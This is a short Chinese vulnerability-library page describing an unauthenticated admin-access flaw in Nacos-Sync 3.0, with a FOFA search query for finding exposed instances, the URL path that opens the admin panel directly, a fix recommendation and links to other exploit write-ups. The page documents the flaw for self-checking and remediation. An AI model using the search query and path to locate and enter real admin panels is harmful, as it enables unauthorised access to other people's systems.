Nacos-Sync-未授权进后台(建议自查)

25015

漏洞成因

没进行权限校验。

漏洞范围

Nacos-Sync 3.0

发现方式

一、FOFA

title="nacos" && title=="Nacos-Sync"

二、路径拼接

/#/serviceSync

利用方式

拼接URL直接进入后台

http://127.0.0.1#/serviceSync

d2b5ca33bd173141

修复方式

对于鉴权类型的漏洞,主要的修复方式是全局增加鉴权

温馨提示:一切未经授权的渗透测试行为均为违法行为。
© 版权声明
分享是一种美德,转载请保留原链接。
THE END
漏洞库
# Nacos-Sync# 未授权访问
喜欢就支持一下吧
点赞15 分享
相关推荐
BSPHP存在未授权访问-星辰信安
BSPHP存在未授权访问
BSPHP存在未授权访问
1年前 737
DedeCMS V5.7 SP2后台存在代码执行漏洞-星辰信安
DedeCMS V5.7 SP2后台存在代码执行漏洞
DedeCMS V5.7 SP2后台存在代码执行漏洞
1年前 498
fastadmin前台getshell漏洞-星辰信安
fastadmin前台getshell漏洞
fastadmin前台getshell漏洞
1年前 373
Smartbi 用户认证绕过+日志导出-星辰信安
Smartbi 用户认证绕过+日志导出
Smartbi 用户认证绕过+日志导出
1年前 363
Nacos-Sync-未授权进后台(建议自查)-星辰信安
Nacos-Sync-未授权进后台(建议自查)
Nacos-Sync-未授权进后台(建议自查)
1年前 250
深信服EDR 远程命令执行-2020-hvv2-星辰信安
深信服EDR 远程命令执行-2020-hvv2
深信服EDR 远程命令执行-2020-hvv2
1年前 243